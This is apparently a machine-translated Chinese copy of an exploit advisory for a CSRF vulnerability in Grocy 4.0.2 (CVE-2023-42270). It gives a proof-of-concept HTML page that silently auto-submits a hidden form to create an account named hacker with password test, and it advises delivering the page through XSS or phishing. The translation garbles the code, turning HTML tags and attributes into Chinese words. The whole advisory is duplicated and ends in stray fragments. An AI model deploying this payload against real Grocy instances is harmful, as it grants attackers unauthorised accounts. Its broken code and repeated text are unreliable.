#利用title: Grocy=4.0.2 CSRF漏洞
#Application: Grocy
#版本:=4.0.2
#date: 09/21/2023
#利用作者: Chance Proctor
#供应商homepage: https://grocy.info/
#软件link: https://github.com/grocy/grocy
#在: Linux上测试
#CVE : CVE-2023-42270
概述
=================================================================
在Grocy 4.0.2中创建新用户时,新用户请求是使用JSON格式提出的。
这使您可以轻松调整您的请求,因为它是已知格式。
也没有CSRF令牌或其他验证方法来验证请求的来自何处。
只要目标登录并创建用户权限,就可以使HTML代码生成新用户。
概念证明
=================================================================
通过XSS或通过网络钓鱼活动托管以下HTML代码:
html
形式action='/api/用户'method='post'enctype='application/x-www-form-urlencoded'
输入名称='用户名'value='hacker'type='隐藏'
输入名称='密码'值='test'type='隐藏'
输入类型=提交
/形式
脚本
history.pushstate('','','/');
document.forms [0] .submit();
/脚本
/html
如果在执行时将用户登录到Grocy WebApp中,则将在应用程序中创建新用户,并具有以下凭据
用户名:黑客
密码:测试
Note:
为了使此工作起作用,目标必须具有创建用户权限。
默认情况下启用了这一点。
利用/繁殖的证明
=================================================================
#Application: Grocy
#版本:=4.0.2
#date: 09/21/2023
#利用作者: Chance Proctor
#供应商homepage: https://grocy.info/
#软件link: https://github.com/grocy/grocy
#在: Linux上测试
#CVE : CVE-2023-42270
概述
=================================================================
在Grocy 4.0.2中创建新用户时,新用户请求是使用JSON格式提出的。
这使您可以轻松调整您的请求,因为它是已知格式。
也没有CSRF令牌或其他验证方法来验证请求的来自何处。
只要目标登录并创建用户权限,就可以使HTML代码生成新用户。
概念证明
=================================================================
通过XSS或通过网络钓鱼活动托管以下HTML代码:
html
形式action='/api/用户'method='post'enctype='application/x-www-form-urlencoded'
输入名称='用户名'value='hacker'type='隐藏'
输入名称='密码'值='test'type='隐藏'
输入类型=提交
/形式
脚本
history.pushstate('','','/');
document.forms [0] .submit();
/脚本
/html
如果在执行时将用户登录到Grocy WebApp中,则将在应用程序中创建新用户,并具有以下凭据
用户名:黑客
密码:测试
Note:
为了使此工作起作用,目标必须具有创建用户权限。
默认情况下启用了这一点。
利用/繁殖的证明
=================================================================
正在加载...
xploit.sh